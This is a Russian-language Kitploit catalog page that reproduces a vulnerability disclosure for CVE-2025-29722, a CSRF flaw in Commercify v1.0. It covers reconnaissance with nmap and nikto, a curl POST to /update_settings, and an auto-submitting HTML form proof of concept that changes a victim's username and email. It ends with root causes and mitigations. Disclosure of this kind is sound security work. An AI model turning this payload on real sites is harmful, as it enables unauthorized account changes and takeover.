Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29722 — Межсайтовая подделка запросов (CSRF) в Commercify v1.0 | Kitploit
Инструменты/GitHubGitHub/cypherdavy/cve-2025-29722
РазведкаАнализ уязвимостейЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubcypherdavy/cve-2025-29722

CVE-2025-29722

Межсайтовая подделка запросов (CSRF) в Commercify v1.0

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-29722 – Межсайтовая подделка запроса (CSRF) в Commercify v1.0

Обнаружено: David P.S Abraham (также известный как Davycipher)


CVE ID

CVE-2025-29722 был присвоен этой уязвимости организацией MITRE Corporation.


Краткое описание

Уязвимость CSRF была обнаружена в Commercify v1.0, платформе электронной коммерции с открытым исходным кодом, разработанной @yassmittal. Приложение не имеет надлежащих механизмов защиты от CSRF на критических конечных точках, таких как /update_settings, что позволяет злоумышленникам создавать вредоносные запросы, изменяющие данные пользователя при выполнении с другого домена.


Затронутый продукт

  • Название продукта: Commercify
  • Версия: 1.0
  • Репозиторий: https://github.com/yassmittal/Commercify

Тип уязвимости

  • CWE-352: Межсайтовая подделка запроса (CSRF)

Процесс эксплуатации

Фаза разведки

Сканирование nmap показало, что служба доступна через порт 5173, что указывает на возможный сервер разработки.

root@kitploit:~
nmap -p 5173 localhost

Затем я просканировал приложение с помощью nikto, что выявило:

  • Отсутствие заголовка X-Frame-Options
  • Разрешительная политика CORS (Access-Control-Allow-Origin: *)
  • Отсутствие заголовков защиты от CSRF

Перебор конечных точек

Исследуя приложение, я заподозрил возможную конечную точку update_settings на основе функций панели пользователя. Я протестировал её с помощью:

root@kitploit:~
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"

Хотя был возвращён 404 Not Found, это поведение может зависеть от окружения. В действующих развертываниях это может привести к полному манипулированию учетной записью.


Доказательство концепции (PoC)

Атака на основе HTML для эксплуатации уязвимости CSRF:

root@kitploit:~
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="[email protected]">
</form>
<script>
  document.forms[0].submit();
</script>

Воздействие

  • Несанкционированные изменения данных учетной записи пользователя
  • Повышение привилегий, если настройки включают манипуляции с ролью или электронной почтой
  • Сценарии захвата учетной записи

Коренная причина

  • Отсутствие токенов CSRF
  • Отсутствие атрибута cookie SameSite
  • Разрешительный CORS (*)
  • Отсутствие проверки referer и origin

Смягчение и рекомендации

  • Добавьте токены CSRF для всех конечных точек, изменяющих состояние
  • Установите SameSite=Strict или Lax для cookie
  • Определите строгие политики CORS
  • Внедрите проверку origin/referer

Обнаружитель

David P.S. Abraham
Псевдоним: Davycipher

  • GitHub
  • LinkedIn
  • Веб-сайт

Скачать инструмент